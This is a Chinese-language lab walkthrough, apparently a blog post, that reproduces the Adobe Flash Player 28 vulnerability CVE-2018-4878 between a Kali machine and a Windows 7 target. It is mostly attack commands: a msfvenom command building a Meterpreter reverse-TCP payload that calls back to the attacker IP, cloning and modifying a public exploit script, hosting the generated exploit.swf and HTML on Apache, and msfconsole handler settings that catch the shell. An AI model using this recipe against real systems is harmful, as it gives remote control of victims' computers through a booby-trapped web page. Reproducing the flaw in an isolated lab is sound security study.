[漏洞复现]Adobe flash player 28(CVE-2018-4878)

攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。

环境:

  • 渗透机 Kali Linux ip:192.168.43.177
  • 靶机 Windows 7 sp1 192.168.43.196
  • exp:cve-2018-4878.py 来自https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019
  • flash: flashplayeractivex28.0.0.137.exe 下载地址链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0

实验步骤

一、kali 使用 msfvenom 生成 shell 代码

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.177 lport=8888 -f python>shellcode.txt

msfvenom的用法可参考 https://www.jianshu.com/p/dee2b171a0a0
下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助。

二、生成swf和html

git clone  https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019.git

使用上面生成的payload替换cve-2018-4878.py中的payload

image.png

更改输出文件路径

更改输出文件的路径

执行cve-2018-4878.py,会生成两个文件

python cve-2018-4878.py
生成的文件

开启apache,将生成的两个文件拷贝到/var/www/html中

service apache2 start
cp index2.html /var/www/html/index2.html
cp exploit.swf /var/www/html/exploit.swf

kali开启监听

#msfconsole启动
msfconsole
#使用handler监听模块  
msf > use exploit/multi/handler 
#回弹一个tcp连接  
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
#设置kali渗透机的ip地址  
msf exploit(handler) > set lhost 192.168.43.177
#设置监听端口,这个需跟上面msfvenom设置的端口一致  
msf exploit(handler) > set lport 8888 
#开启监听,等待靶机上线 
msf exploit(handler) > exploit
开启监听

靶机安装adobe flash player

image.png

访问http://192.168.43.177/index2.html
image.png

kali getshell成功
image.png

meterpreter用法可参考https://www.cnblogs.com/backlion/p/9484949.html

参考资料

https://blog.51cto.com/chenxinjie/2093653
https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019/blob/master/%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A.md
https://www.cnblogs.com/backlion/p/9484949.html

你可能感兴趣的:([漏洞复现]Adobe flash player 28(CVE-2018-4878))